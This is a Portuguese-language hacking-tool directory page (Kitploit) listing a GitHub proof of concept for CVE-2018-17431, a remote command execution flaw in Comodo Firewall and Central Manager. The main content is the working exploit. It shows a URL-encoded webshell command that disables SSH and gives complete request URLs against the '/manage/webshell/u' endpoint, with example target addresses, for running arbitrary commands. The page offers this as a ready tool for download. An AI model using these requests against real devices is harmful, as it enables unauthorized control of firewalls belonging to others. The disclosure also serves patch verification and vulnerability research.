Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/sanan2004/cve-2018-17431-comodo
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubsanan2004/cve-2018-17431-comodo

CVE-2018-17431-Comodo

Comodo

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-17431-PoC

Prova de conceito para CVE-2018-17431

Título do Exploit: Comodo Firewall & Central Manager (UTM) – todas as versões anteriores a 2.7.0 e 1.5.0 – Execução Remota de Comandos (baseado em Web Shell)

Autor do Exploit: Milad Fadavvi

Página do fornecedor: https://www.comodo.com/

Link do software: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Versão: anterior a 2.7.0 e 1.5.0

Testado em: Windows:firefox/chrome - Kali:firefox

Data da descoberta: 2018-08-15 (relatado no mesmo dia)

Confirmação de que o bug existe: 2018-09-22 (Ticket ID: XWR-503-79437))

Exploit:

  1. Simulação do WebShell:

     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Codifique

     make above sequense encode with URL ECODING
     (I used burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Execute

     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Uma página com a mensagem "Configuration has been altered" aparecerá e a configuração será alterada!

Com esta técnica, podemos simular todos os comandos do WebShell.

Baixar ferramenta